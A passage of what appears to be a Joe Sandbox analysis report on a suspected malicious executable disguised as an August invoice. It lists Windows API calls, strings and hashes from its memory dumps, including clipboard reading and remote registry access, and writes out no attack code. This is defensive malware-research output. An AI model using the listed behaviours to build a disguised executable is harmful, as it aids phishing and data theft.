                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: __wcsnicmp
                                                          • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                          • API String ID: 1038674560-3360698832
                                                          • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                          • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                          • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                          • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                          APIs
                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                          • SetCursor.USER32(00000000), ref: 0043075B
                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                          • SetCursor.USER32(00000000), ref: 00430773
                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                          • SetCursor.USER32(00000000), ref: 0043078B
                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                          • SetCursor.USER32(00000000), ref: 004307A3
                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                          • SetCursor.USER32(00000000), ref: 004307BB
                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                          • SetCursor.USER32(00000000), ref: 004307D3
                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                          • SetCursor.USER32(00000000), ref: 004307EB
                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                          • SetCursor.USER32(00000000), ref: 00430803
                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                          • SetCursor.USER32(00000000), ref: 0043081B
                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                          • SetCursor.USER32(00000000), ref: 00430833
                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                          • SetCursor.USER32(00000000), ref: 0043084B
                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                          • SetCursor.USER32(00000000), ref: 00430863
                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                          • SetCursor.USER32(00000000), ref: 0043087B
                                                          • SetCursor.USER32(00000000), ref: 00430887
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                          • SetCursor.USER32(00000000), ref: 0043089F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Cursor$Load
                                                          • String ID:
                                                          • API String ID: 1675784387-0
                                                          • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                          • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                          • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                          • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                          APIs
                                                          • GetSysColor.USER32(0000000E), ref: 00430913
                                                          • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                          • GetSysColor.USER32(00000012), ref: 00430933
                                                          • SetTextColor.GDI32(?,?), ref: 0043093B
                                                          • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                          • GetSysColor.USER32(0000000F), ref: 00430959
                                                          • CreateSolidBrush.GDI32(?), ref: 00430962
                                                          • GetSysColor.USER32(00000011), ref: 00430979
                                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                          • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                          • SetBkColor.GDI32(?,?), ref: 004309A6
                                                          • SelectObject.GDI32(?,?), ref: 004309B4
                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                          • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                          • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                          • GetSysColor.USER32(00000011), ref: 00430A9F
                                                          • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                          • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                          • SelectObject.GDI32(?,?), ref: 00430AD0
                                                          • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                          • SelectObject.GDI32(?,?), ref: 00430AE3
                                                          • DeleteObject.GDI32(?), ref: 00430AE9
                                                          • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                          • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                          • String ID:
                                                          • API String ID: 1582027408-0
                                                          • Opcode ID: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                          • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                          • Opcode Fuzzy Hash: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                          • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                          APIs
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                          • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: CloseConnectCreateRegistry
                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                          • API String ID: 3217815495-966354055
                                                          • Opcode ID: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                          • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                          • Opcode Fuzzy Hash: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                          • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                          APIs
                                                          • GetCursorPos.USER32(?), ref: 004566AE
                                                          • GetDesktopWindow.USER32 ref: 004566C3
                                                          • GetWindowRect.USER32(00000000), ref: 004566CA
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                          • DestroyWindow.USER32(?), ref: 00456746
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                          • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                          • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                          • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                          • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                          • IsWindowVisible.USER32(?), ref: 0045682C
                                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                          • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                          • GetWindowRect.USER32(?,?), ref: 00456873
                                                          • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                          • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                          • CopyRect.USER32(?,?), ref: 004568BE
                                                          • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                          • String ID: ($,$tooltips_class32
                                                          • API String ID: 225202481-3320066284
                                                          • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                          • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                          • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                          • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                          APIs
                                                          • OpenClipboard.USER32(?), ref: 0046DCE7
                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                          • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                          • CloseClipboard.USER32 ref: 0046DD0D
                                                          • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                          • CloseClipboard.USER32 ref: 0046DD41
                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                          • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                          • CloseClipboard.USER32 ref: 0046DD99
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                          • String ID:
                                                          • API String ID: 15083398-0
                                                          • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                          • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                          • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                          • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                          APIs
                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                          • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                          • GetClientRect.USER32(?,?), ref: 00471D05
                                                          • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                          • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                          • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                          • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                          • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                          • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                          • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                          • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                          • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                          • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                          • GetClientRect.USER32(?,?), ref: 00471E8A
                                                          • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                          • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                          • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                          • String ID: @$AutoIt v3 GUI
                                                          • API String ID: 867697134-3359773793
                                                          • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                          • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                          • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                          • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: __wcsicoll$__wcsnicmp
                                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                          • API String ID: 790654849-32604322
                                                          • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                          • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                          • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                          • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                          • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                          • Opcode Fuzzy Hash: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                          • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                          APIs
                                                            • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                          • _fseek.LIBCMT ref: 00452B3B
                                                          • __wsplitpath.LIBCMT ref: 00452B9B
                                                          • _wcscpy.LIBCMT ref: 00452BB0
                                                          • _wcscat.LIBCMT ref: 00452BC5
                                                          • __wsplitpath.LIBCMT ref: 00452BEF
                                                          • _wcscat.LIBCMT ref: 00452C07
                                                          • _wcscat.LIBCMT ref: 00452C1C
                                                          • __fread_nolock.LIBCMT ref: 00452C53
                                                          • __fread_nolock.LIBCMT ref: 00452C64
                                                          • __fread_nolock.LIBCMT ref: 00452C83
                                                          • __fread_nolock.LIBCMT ref: 00452C94
                                                          • __fread_nolock.LIBCMT ref: 00452CB5
                                                          • __fread_nolock.LIBCMT ref: 00452CC6
                                                          • __fread_nolock.LIBCMT ref: 00452CD7
                                                          • __fread_nolock.LIBCMT ref: 00452CE8
                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                          • __fread_nolock.LIBCMT ref: 00452D78
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                          • String ID:
                                                          • API String ID: 2054058615-0
                                                          • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                          • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                          • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                          • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Window
                                                          • String ID: 0
                                                          • API String ID: 2353593579-4108050209
                                                          • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                          • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                          • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                          • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                          APIs
                                                          • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                          • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                          • GetWindowDC.USER32(?), ref: 0044A0F6
                                                          • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                          • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                          • GetSysColor.USER32(0000000F), ref: 0044A131
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                          • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                          • GetSysColor.USER32(00000005), ref: 0044A15B
                                                          • GetWindowDC.USER32(?), ref: 0044A1BE
                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                          • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                          • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                          • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                          • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                          • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                          • GetSysColor.USER32(00000008), ref: 0044A265
                                                          • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                          • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                          • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
